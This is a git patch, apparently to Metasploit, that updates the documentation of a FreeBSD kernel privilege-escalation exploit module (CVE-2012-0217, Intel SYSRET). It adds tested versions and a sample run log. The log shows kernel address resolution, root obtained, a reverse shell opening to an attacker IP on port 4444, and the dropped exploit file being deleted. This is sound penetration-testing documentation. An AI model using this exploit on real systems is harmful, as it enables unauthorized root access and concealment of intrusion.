From 1cf5c79cc83fee2326965fdd2e1a0bf66ddbec8e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 14 Dec 2018 11:00:18 +0000 Subject: [PATCH] Update documentation --- .../freebsd/local/intel_sysret_priv_esc.md | 40 ++++++++++++++----- 1 file changed, 31 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index 1065b4da5f..d0086291b7 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -1,7 +1,7 @@ ## Description - This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64) - kernel, when running on 64-bit Intel processors. + This module exploits a vulnerability in the FreeBSD kernel, + when running on 64-bit Intel processors. By design, 64-bit processors following the X86-64 specification will trigger a general protection fault (GPF) when executing a SYSRET @@ -15,7 +15,10 @@ ## Vulnerable Application - This module has been tested successfully on FreeBSD 9.0-RELEASE. + This module has been tested successfully on: + + * FreeBSD 8.3-RELEASE (amd64) + * FreeBSD 9.0-RELEASE (amd64) ## Verification Steps @@ -64,12 +67,31 @@ [*] Max line length is 131073 [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf [*] Launching exploit... - [*] [+] SYSRET FUCKUP!! - [*] [+] Start Engine... - [*] [+] Crotz... - [*] [+] Crotz... - [*] [+] Crotz... - [*] [+] Woohoo!!! + [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com) + [*] + [*] [*] Retrieving host information... + [*] [+] CPU: GenuineIntel + [*] [+] sysname: FreeBSD + [*] [+] release: 9.0-RELEASE + [*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC + [*] [+] machine: amd64 + [*] [*] Validating target OS and version... + [*] [+] Vulnerable :-) + [*] [*] Resolving kernel addresses... + [*] [+] Resolved Xofl to 0xffffffff80b02e70 + [*] [+] Resolved Xbnd to 0xffffffff80b02ea0 + [*] [+] Resolved Xill to 0xffffffff80b02ed0 + [*] [+] Resolved Xdna to 0xffffffff80b02f00 + [*] [+] Resolved Xpage to 0xffffffff80b03240 + [*] [+] Resolved Xfpu to 0xffffffff80b02fc0 + [*] [+] Resolved Xalign to 0xffffffff80b03080 + [*] [+] Resolved Xmchk to 0xffffffff80b02f60 + [*] [+] Resolved Xxmm to 0xffffffff80b02ff0 + [*] [*] Setup... + [*] [+] Trigger code... + [*] [+] Trampoline code... + [*] [*] Fire in the hole! + [*] [*] Got root! [+] Success! Executing payload... [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500 [+] Deleted /tmp/.mTaR4rAPd.c